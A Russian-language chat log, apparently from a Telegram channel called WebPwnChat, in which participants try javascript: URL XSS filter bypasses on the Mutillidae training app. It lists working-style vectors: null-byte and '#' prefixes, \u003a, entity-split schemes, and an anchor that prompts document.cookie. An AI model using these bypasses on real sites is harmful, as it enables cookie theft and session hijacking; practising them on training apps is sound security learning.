Size: a a a

2020 May 30

ЭК

Элайджи Камски... in WebPwnChat
Ivan
создай у себя локальный файл и проверь лично
На мутиллидае проверю.
источник

I

Ivan in WebPwnChat
источник

ЭК

Элайджи Камски... in WebPwnChat
источник

ЭК

Элайджи Камски... in WebPwnChat
Отработало просто с хреф, ща попробую с http
источник

I

Ivan in WebPwnChat
а теперь добавь свои %00, которые ты напридумывал
источник

I

Ivan in WebPwnChat
%00javascript:alert()
%00javascript%00:alert()
источник

ЭК

Элайджи Камски... in WebPwnChat
Бэд реквест да.
источник

ЭК

Элайджи Камски... in WebPwnChat
Был не прав, извиняюсь.
источник

᠌᠌Sh1Yo in WebPwnChat
Обнаружил что если поставить "#/?\" перед запросом, то весь запрос пропускает типа #javascript:alert
источник

ЭК

Элайджи Камски... in WebPwnChat
# это коментарий кажется, оно будет пропускать всё что идёт после него без обработки.
источник

᠌᠌Sh1Yo in WebPwnChat
Ну ?javascript:alert() и /javascript:alert() тоже работает
источник

ЭК

Элайджи Камски... in WebPwnChat
источник

᠌᠌Sh1Yo in WebPwnChat
Может есть какие-то секретные байпассы типа "/%0ajavascript:alert()" (спойлер это не работает)
источник

ЭК

Элайджи Камски... in WebPwnChat
C # не будет работать, это комент.
источник

自閉症のポイント... in WebPwnChat
᠌᠌Sh1Yo
Может есть какие-то секретные байпассы типа "/%0ajavascript:alert()" (спойлер это не работает)
Я хз, но попробуй заменить : на \u003a
источник

自閉症のポイント... in WebPwnChat
Но там вроде тока с функциями работает
источник

᠌᠌Sh1Yo in WebPwnChat
自閉症のポイント
Я хз, но попробуй заменить : на \u003a
Firefox парсит это как href=javascript/u003aalert()
источник

I

Ivan in WebPwnChat
Может что-нибудь из этого пролезет?
<a href="j&NewLine;avascript:prompt(document.cookie)">asdasd</a><br>
<a href="javascript&colon;this&lsqb;'a'&plus;'lert'&rsqb;`1`">asdasd</a><br>
<a href="javascript://google.com/?x=%0Aalert`Hello!`">asdasd</a><br>
<a href="javascript://%0aalert();">asdasd</a><br>
<a href="javascript&#58;alert(1)">asdasd</a><br>
<a href="java&#x73;cript:alert()">asdasd2</a><br>
источник

I

Ivan in WebPwnChat
соответственно сущностями типа
&NewLine;
можно "разбить" схему javascript и это не поломает вектор
источник

᠌᠌Sh1Yo in WebPwnChat
К сажелению из за кодировки & -> &amp; это не будет работат, а третий и четвертый снизу блокируется
источник